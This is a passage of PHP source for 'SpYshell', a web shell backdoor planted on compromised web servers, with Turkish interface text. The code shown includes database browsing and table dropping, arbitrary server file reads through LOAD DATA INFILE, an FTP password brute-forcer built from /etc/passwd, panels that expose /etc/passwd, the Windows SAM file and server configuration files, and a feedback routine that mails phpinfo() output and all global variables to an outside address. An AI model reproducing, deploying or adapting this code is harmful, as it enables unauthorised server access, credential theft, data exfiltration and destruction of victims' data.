      echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>";
      echo "<tr>";
      echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
      for ($i=0;$i<mysql_num_fields($result);$i++)
      {
       $v = mysql_field_name($result,$i);
       if ($e[0] == "a") {$s = "d"; $m = "asc";}
       else {$s = "a"; $m = "desc";}
       echo "<td>";
       if (empty($e[0])) {$e[0] = "a";}
       if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
       else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";}
       echo "</td>";
      }
      echo "<td><font color=\"green\"><b>Action</b></font></td>";
      echo "</tr>";
      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
      {
       echo "<tr>";
       $w = "";
       $i = 0;
       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
       echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
       $i = 0;
       foreach ($row as $k=>$v)
       {
        $v = htmlspecialchars($v);
        if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
        echo "<td>".$v."</td>";
        $i++;
       }
       echo "<td>";
       echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"SIL\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;";
       echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Duzenle\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;";
       echo "</td>";
       echo "</tr>";
      }
      mysql_free_result($result);
      echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
      echo "<option value=\"\">Secildi:</option>";
      echo "<option value=\"deleterow\">SIL/option>";
      echo "</select>&nbsp;<input type=\"submit\" value=\"OK\"></form></p>";
     }
    }
    else
    {
     $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
     if (!$result) {echo mysql_smarterror();}
     else
     {
      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Olusturd</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
      $i = 0;
      $tsize = $trows = 0;
      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
      {
       $tsize += $row["Data_length"];
       $trows += $row["Rows"];
       $size = view_size($row["Data_length"]);
       echo "<tr>";
       echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
       echo "<td>".$row["Rows"]."</td>";
       echo "<td>".$row["Tip"]."</td>";
       echo "<td>".$row["Olusturma Zamani"]."</td>";
       echo "<td>".$row["Guncelleme Zamani"]."</td>";
       echo "<td>".$size."</td>";
       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"BOS\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Sok :)\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>";
       echo "</tr>";
       $i++;
      }
      echo "<tr bgcolor=\"000000\">";
      echo "<td><center><b></b></center></td>";
      echo "<td><center><b>".$i." table(s)</b></center></td>";
      echo "<td><b>".$trows."</b></td>";
      echo "<td>".$row[1]."</td>";
      echo "<td>".$row[10]."</td>";
      echo "<td>".$row[11]."</td>";
      echo "<td><b>".view_size($tsize)."</b></td>";
      echo "<td></td>";
      echo "</tr>";
      echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
      echo "<option value=\"\">Sec:</option>";
      echo "<option value=\"tbldrop\">Drop</option>";
      echo "<option value=\"tblempty\">Empty</option>";
      echo "<option value=\"tbldump\">Dump</option>";
      echo "<option value=\"tblcheck\">Check table</option>";
      echo "<option value=\"tbloptimize\">Optimize table</option>";
      echo "<option value=\"tblrepair\">Repair table</option>";
      echo "<option value=\"tblanalyze\">Analyze table</option>";
      echo "</select>&nbsp;<input type=\"submit\" value=\"OK!\"></form></p>";
      mysql_free_result($result);
     }
    }
   }
   }
  }
  else
  {
   $acts = array("","newdb","serverstatus","servervars","processes","getfile");
   if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Olustur yeni DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
   if (!empty($sql_act))
   {
    echo "<hr size=\"1\" noshade>";
    if ($sql_act == "newdb")
    {
     echo "<b>";
     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DataBase \"".htmlspecialchars($sql_newdb)."\" Olusturma OKlandi.</b><br>";}
     else {echo "Olusturulamadi \"".htmlspecialchars($sql_newdb)."\".<br>Sebep:</b> ".mysql_smarterror();}
    }
    if ($sql_act == "serverstatus")
    {
     $result = mysql_query("SHOW STATUS", $sql_sock);
     echo "<center><b>Server Durumu Kararsiz:</b><br><br>";
     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
     echo "</table></center>";
     mysql_free_result($result);
    }
    if ($sql_act == "servervars")
    {
     $result = mysql_query("SHOW VARIABLES", $sql_sock);
     echo "<center><b>Server variables:</b><br><br>";
     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
     echo "</table>";
     mysql_free_result($result);
    }
    if ($sql_act == "processes")
    {
     if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
     $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
     echo "<center><b>Processes:</b><br><br>";
     echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
     echo "</table>";
     mysql_free_result($result);
    }
    if ($sql_act == "getfile")
    {
     $tmpdb = $sql_login."_tmpdb";
     $select = mysql_select_db($tmpdb);
     if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
     if ($select)
     {
      $created = false;
      mysql_query("Olustur TABLE `tmp_file` ( `Gozleninen dosya guvenli mod da+open_basedir` LONGBLOB NOT NULL );");
      mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
      $result = mysql_query("SELECT * FROM tmp_file;");
      if (!$result) {echo "<b>Okuma Hatasi (Erisim Engellendi!)!</b>";}
      else
      {
       for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
       $f = "";
       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
       if (empty($f)) {echo "<b>Dosya \"".$sql_getfile."\" yok veya Bo$!</b><br>";}
       else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
       mysql_free_result($result);
       mysql_query("DROP TABLE tmp_file;");
      }
     }
     mysql_drop_db($tmpdb); //comment it if you want to leave database
    }
   }
  }
 }
 echo "</td></tr></table>";
 if ($sql_sock)
 {
  $affected = @mysql_affected_rows($sql_sock);
  if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
  echo "<tr><td><center><b>yapmacik(sahte) rows: ".$affected."</center></td></tr>";
 }
 echo "</table>";
}
if ($act == "mkdir")
{
 if ($mkdir != $d)
 {
  if (file_exists($mkdir)) {echo "<b>Klasor yap \"".htmlspecialchars($mkdir)."\"</b>: Obje Zaten Var..";}
  elseif (!mkdir($mkdir)) {echo "<b>Klasor yap \"".htmlspecialchars($mkdir)."\"</b>: Giris Izin Vermedi";}
  echo "<br><br>";
 }
 $act = $dspact = "ls";
}
if ($act == "ftpquickbrute")
{
 echo "<b>Ftp Hizli Sifre Alma :P By KingDefacer</b><br>";
 if (!win) {echo "Windows ta Calismaz haa ona goreeee SpyHackTeaM <br><br>";}
 else
 {
  function ashftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
  {
   if ($fqb_onlywithsh) {$true = (!in_array($sh,array("/bin/false","/sbin/nologin")));}
   else {$true = true;}
   if ($true)
   {
    $sock = @ftp_connect($host,$port,$timeout);
    if (@ftp_login($sock,$login,$pass))
    {
     echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Baglanildi.. ".$host." icin  Giris \"".$login."\" &  Sifre \"".$pass."\"</b></a>.<br>";																																    ob_flush();
     return true;
    }
   }
  }
  if (!empty($submit))
  {
   if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
   $fp = fopen("/etc/passwd","r");
   if (!$fp) {echo "/etc/passwd -Sifre listesi alinamadi.";}
   else
   {
    if ($fqb_logging)
    {
     if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
     else {$fqb_logfp = false;}
     $fqb_log = "FTP Hizli Brute (called SpYshell ".$shver.") Baslanan ".date("d.m.Y H:i:s")."\r\n\r\n";
     if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
    }
    ob_flush();
    $i = $success = 0;
    $ftpquick_st = getmicrotime();
    while(!feof($fp))
    {
     $str = explode(":",fgets($fp,2048));
     if (ashftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
     {
      echo "<b>Baglanildi -->".getenv("SERVER_NAME")." a login \"".$str[0]."\" Ve sifre \"".$str[0]."\"</b><br>";
      $fqb_log .= "Baglanildi -->".getenv("SERVER_NAME")." a login \"".$str[0]."\" ve Sifre \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
      if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
      $success++;
      ob_flush();
     }
     if ($i > $fqb_lenght) {break;}
     $i++;
    }
    if ($success == 0) {echo "No success. baglantilar!"; $fqb_log .= "No success. baglantilar!\r\n";}
    $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
    echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Toplam Baglanti: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
    $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
    if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
    if ($fqb_logemail) {@mail($fqb_logemail,"SpYshell v. ".$shver." report",$fqb_log);}
    fclose($fqb_logfp);
   }
  }
  else
  {
   $logfile = $tmpdir_logs."ashsh_ftpquickbrute_".date("d.m.Y_H_i_s").".log";
   $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute Yap\"></form>";
  }
 }
}
if ($act == "d")
{
 if (!is_dir($d)) {echo "<center><b>Permision Engelledi!</b></center>";}
 else
 {
  echo "<b>Uzanti Bilgisi:</b><table border=0 cellspacing=1 cellpadding=2>";
  if (!$win)
  {
   echo "<tr><td><b>Owner/Group</b></td><td> ";
   $ow = posix_getpwuid(fileowner($d));
   $gr = posix_getgrgid(filegroup($d));
   $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
  }
  echo "<tr><td><b>Permissions(Engel)</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Olusturma Zamani:</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Giris Zamani:</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>Modified Time:</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";
 }
}
if ($act == "phpinfo") {@ob_clean(); phpinfo(); ashshexit();}
if ($act == "security")
{
 echo "<center><b>Server Security Information:</b></center><b>Dizin: ".$hopenbasedir."</b><br>";
 if (!$win)
 {
  if ($nixpasswd)
  {
   if ($nixpasswd == 1) {$nixpasswd = 0;}
   echo "<b>*nix /etc/passwd:</b><br>";
   if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
   if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
   $i = $nixpwd_s;
   while ($i < $nixpwd_e)
   {
    $uid = posix_getpwuid($i);
    if ($uid)
    {
     $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
     echo join(":",$uid)."<br>";
    }
    $i++;
   }
  }
  else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
 }
 else
 {
  $v = $_SERVER["WINDIR"]."\repair\sam";
  if (file_get_contents($v)) {echo "<b><font color=red>You Can't Rent Winnt Password :( (".$v.") </font></b><br>";}
  else {echo "<b><font color=green>You can crack the winnt password dude :)<a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ .</font></b><br>";}
 }
 if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>GGWP.CoM</b></u></a></font></b><br>";}
 if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>Cpanel See Your Logs</b></u></a></font></b><br>";}
 if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache Configuration (httpd.conf)</b></u></a></font></b><br>";}
 if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache Configuration (httpd.conf)</b></u></a></font></b><br>";}
 if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog Configuration (syslog.conf)</b></u></a></font></b><br>";}
 if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Daily Message</b></u></a></font></b><br>";}
 if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";}
 function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}}
 displaysecinfo("OS",myshellexec("cat /proc/version"));
 displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version"));
 displaysecinfo("Class Name",myshellexec("cat /etc/issue.net"));
 displaysecinfo("class name (2)",myshellexec("cat /etc/*-realise"));
 displaysecinfo("Processor",myshellexec("cat /proc/cpuinfo"));
 displaysecinfo("RAM",myshellexec("free -m"));
 displaysecinfo("Hard Disk Space",myshellexec("df -h"));
 displaysecinfo("Local Directory",myshellexec("lsattr -a"));
 displaysecinfo("Disc Burn Information ",myshellexec("cat /etc/fstab"));
 displaysecinfo("cURL Loaded?",myshellexec("which curl"));
 displaysecinfo("lynx Loaded?",myshellexec("which lynx"));
 displaysecinfo("links Loaded?",myshellexec("which links"));
 displaysecinfo("fetch Loaded?",myshellexec("which fetch"));
 displaysecinfo("GET Loaded?",myshellexec("which GET"));
 displaysecinfo("perl Loaded?",myshellexec("which perl"));
 displaysecinfo("Apache loaded place ?",myshellexec("whereis apache"));
 displaysecinfo("Perl loaded place ?",myshellexec("whereis perl"));
 displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf"));
 displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf"));
 displaysecinfo("locate my.conf",myshellexec("locate my.conf"));
 displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf"));
}
if ($act == "mkfile")
{
 if ($mkfile != $d)
 {
  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
  else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
 }
 else {$act = $dspact = "ls";}
}
if ($act == "encoder")
{
 echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Cyriptos:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Data entered:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"OK\"><br><br></center><b>Hashes</b>:<br><center>";
 foreach(array("md5","crypt","sha1","crc32") as $v)
 {
  echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>";
 }
 echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly>
 <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly>
 <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>";
 echo "<center>base64_decode - ";
 if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";}
 else
 {
  $debase64 = base64_decode($encoder_input);
  $debase64 = str_replace("\0","[0]",$debase64);
  $a = explode("\r\n",$debase64);
  $rows = count($a);
  $debase64 = htmlspecialchars($debase64);
  if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";}
  else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";}
  echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>";
 }
 echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
 $c = strlen($encoder_input);
 for($i=0;$i<$c;$i++)
 {
  $hex = dechex(ord($encoder_input[$i]));
  if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
  elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
 }
 echo "\" readonly><br></center></form>";
}
if ($act == "fsbuff")
{
 $arr_copy = $sess_data["copy"];
 $arr_cut = $sess_data["cut"];
 $arr = array_merge($arr_copy,$arr_cut);
 if (count($arr) == 0) {echo "<center><b>Bumper Empty</b></center>";}
 else {echo "<b>File System's Buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = true; $act = "ls";}
}
if ($act == "selfremove")
{
 if (($submit == $rndcode) and ($submit != ""))
 {
  if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using SpYshell v.".$shver."!"; ashshexit(); }
  else {echo "<center><b>Could not delete :(  ".__FILE__."!</b></center>";}
 }
 else
 {
  if (!empty($rndcode)) {echo "<b>Error: Incorrect confirmation</b>";}
  $rnd = rand(0,9).rand(0,9).rand(0,9);
  echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure ? <br>Enter verification \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"Yup\"></form>";
 }
}
if ($act == "update") {$ret = ashsh_getupdate(!!$confirmupdate); echo "<b>".$ret."</b>"; if (stristr($ret,"new version")) {echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";}}
if ($act == "feedback")
{
 $suppmail = "admin@aferon.com";
 if (!empty($submit))
 {
  $ticket = substr(md5(microtime()+rand(1,1000)),0,6);
  $body = "SpYshell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR;
  if (!empty($fdbk_ref))
  {
   $tmp = @ob_get_contents();
   ob_clean();
   phpinfo();
   $phpinfo = base64_encode(ob_get_contents());
   ob_clean();
   echo $tmp;
   $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n";
  }
  mail($suppmail,"LIZshell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail);
  echo "<center><b>thanks user id: ".$ticket.".</b></center>";
 }
 else {echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=feedback><b>Feedback or report raises a problem (".str_replace($suppmail)."Admin@spyhackerz.com):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>e-mail address : <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message :<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>start server-info* <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br><br><input type=\"submit\" name=\"submit\" value=\"Gonder\"></form>";}
}
if ($act == "search")
{
 echo "<b>Search System Files:</b><br>";
 if (empty($search_in)) {$search_in = $d;}
 if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
 if (empty($search_text_wwo)) {$search_text_regexp = 0;}
 if (!empty($submit))
 {
  $found = array();
  $found_d = 0;
  $found_f = 0;
  $search_i_f = 0;
  $search_i_d = 0;
  $a = array
  (
   "name"=>$search_name, "name_regexp"=>$search_name_regexp,
   "text"=>$search_text, "text_regexp"=>$search_text_regxp,
   "text_wwo"=>$search_text_wwo,
   "text_cs"=>$search_text_cs,
   "text_not"=>$search_text_not
  );
  $searchtime = getmicrotime();
  $in = array_unique(explode(";",$search_in));
  foreach($in as $v) {ashfsearch($v);}
  $searchtime = round(getmicrotime()-$searchtime,4);
  if (count($found) == 0) {echo "<b>File not found!</b>";}
  else
  {
   $ls_arr = $found;
   $disp_fullpath = true;
   $act = "ls";
  }
 }
 echo "<form method=POST>
<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">
